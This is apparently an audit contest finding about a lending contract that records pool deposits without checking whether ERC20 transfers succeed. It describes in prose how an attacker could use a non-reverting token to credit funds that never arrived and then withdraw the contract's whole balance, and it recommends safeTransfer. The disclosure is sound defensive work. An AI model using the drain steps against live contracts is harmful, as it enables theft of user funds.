Various Methods to Drain User Funds
Summary
In the function addToPool, it is essential to provide the poolId and amount. Subsequently, the function performs several checks, verifying if msg.sender is indeed the pool lender and ensuring that the provided amount is greater than zero. Once these conditions are met, the function proceeds to update the balance of your pool and initiates a transfer accordingly.
However, it is important to note that some ERC20 contracts do not revert if a transaction fails. This means that if the transaction returns false, your pool balance will still be updated with the new value.
Following the addition of funds to the pool, the removeFromPool function allows you to withdraw the funds from your pool that you never add because transaction return false.
Similarly, this situation can also occur with the borrow function. The borrow function allows users to borrow tokens with collateral, but some contracts may not revert in case of a failed transfer. As a result, exploiting this vulnerability allows the attacker to receive loan tokens without having to provide the required collateral.
Its same with repay function and every function that execute transaction ca be exploited.
Vulnerability Details
The attacker observes that the contract holds a balance of 5000 FakeTokens.
Subsequently, the attacker proceeds to create a pool, adding 5 FakeTokens to it.
The attacker then attempts to utilize the addToPool function to add 4995 FakeTokens to the pool. However, the transfer fails without triggering a revert.
Exploiting this situation, the attacker employs the removeFromPool function, using their pool ID and specifying an amount of 5000 FakeTokens. As a result, the attacker successfully drains the entire contract balance of that particular token.
Impact
Drain user funds of tokens that not revert when transfer fail
Tools Used
Manual Review
Recommendations
Adding check in addToPool if all pool balances of that token == real contract balance for of this token or revert. Or just add safeTransfer and safeTransferFrom functions
Prize pool breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.